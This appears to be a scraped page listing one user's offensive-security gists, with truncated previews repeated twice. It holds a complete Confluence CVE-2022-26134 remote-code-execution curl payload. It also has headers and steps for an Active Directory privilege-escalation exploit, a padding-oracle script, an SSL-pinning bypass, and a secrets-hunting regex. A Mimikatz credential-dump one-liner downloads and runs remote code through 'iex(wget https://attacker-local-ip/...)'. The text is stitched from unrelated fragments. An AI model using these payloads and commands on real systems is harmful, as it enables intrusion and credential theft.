Marco hacks2learn

## 365doms.py
#!/usr/bin/env python3

"""
Python script to enumerate valid Microsoft 365 domains, retrieve tenant name, and check for an MDI instance.
Based on: https://github.com/thalpius/Microsoft-Defender-for-Identity-Check-Instance.
Usage: ./check_mdi.py -d <domain>
"""

import argparse
import dns.resolver

## mixunpin.js
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);

/**
 * by incogbyte
 * Common functions
 * thx apkunpacker, NVISOsecurity, TheDauntless
 * Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
 * !!! THIS SCRIPT IS NOT A SILVER BULLET !!

## outline_graph.py
"""
summary: drawing custom graphs
description:
  Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
  show how to write actions that can be performed on those.
keywords: graph, actions
"""

from __future__ import print_function
# -----------------------------------------------------------------------

## pan-oracle.py
import paramiko
import sys
import requests

pad=lambda n: '\0'*(n+1)+(chr(16-n)*(16-n-1))
block_xor=lambda x,y: ''.join(chr(ord(a)^ord(b)) for a,b in zip(x,y))
byte_xor=lambda x,y,z: x[:y]+chr(ord(x[y])^z)+x[y+1:]
set_pad=lambda x,n: block_xor(pad(n), x)

def formatData(d):

## checkmk.py
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests

DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

class PanCrypt():

## cve_2022_26134_curl.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              10 stars
            
          
                jbaines-r7
                / cve_2022_26134_curl.md
            
            
              Created
              June 6, 2022 18:06
            
              
                Confluence CVE-2022-26134 Curl PoC
              
          
    The following curl proof of concept will exfiltrate an executed command on Confluence 7.18.0 and below. The command below executes whoami and will store it in the X-Cmd-Response HTTP header.
curl -v http://10.0.0.247:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/

Example:
albinolobster@ubuntu:~$ curl -v http://10.0.0.28:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.Script


## boilerplate.py
#!/usr/bin/env python3


import argparse
import sys
import json

import logging

## Program.cs
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)

// Steps:
// 1.       Escalate on any workstation (hint: krbrelayup ftw)
// 2.       Execute UpdateMachineAccount.exe as SYSTEM
// 3.       Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4.       Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)

## Generic keys
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

## Invoke-OneShot-Mimikatz.ps1
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
	#!/usr/bin/env python3

	"""
	Python script to enumerate valid Microsoft 365 domains, retrieve tenant name, and check for an MDI instance.
	Based on: https://github.com/thalpius/Microsoft-Defender-for-Identity-Check-Instance.
	Usage: ./check_mdi.py -d <domain>
	"""

	import argparse
	import dns.resolver
	console.log("[*] SSL Pinning Bypasses");
	console.log(`[*] Your frida version: ${Frida.version}`);
	console.log(`[*] Your script runtime: ${Script.runtime}`);

	/**
	* by incogbyte
	* Common functions
	* thx apkunpacker, NVISOsecurity, TheDauntless
	* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
	* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
	"""
	summary: drawing custom graphs
	description:
	Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
	show how to write actions that can be performed on those.
	keywords: graph, actions
	"""

	from __future__ import print_function
	# -----------------------------------------------------------------------
	import paramiko
	import sys
	import requests

	pad=lambda n: '\0'(n+1)+(chr(16-n)(16-n-1))
	block_xor=lambda x,y: ''.join(chr(ord(a)^ord(b)) for a,b in zip(x,y))
	byte_xor=lambda x,y,z: x[:y]+chr(ord(x[y])^z)+x[y+1:]
	set_pad=lambda x,n: block_xor(pad(n), x)

	def formatData(d):
	from hashlib import md5, sha1
	from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
	from cryptography.hazmat.backends import default_backend
	from base64 import b64encode, b64decode
	import sys, time
	import requests

	DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

	class PanCrypt():
	// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
	// Author: @domchell - MDSec
	// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
	// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)

	// Steps:
	// 1. Escalate on any workstation (hint: krbrelayup ftw)
	// 2. Execute UpdateMachineAccount.exe as SYSTEM
	// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
	// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
	# TLDR:
	# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
	#
	# @author Pichaya Morimoto (p.morimoto@sth.sh)
	# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
	# (Tested and worked on Windows 10 x64 patched 2022-03-26)
	#
	# Usage:
	# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
	# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)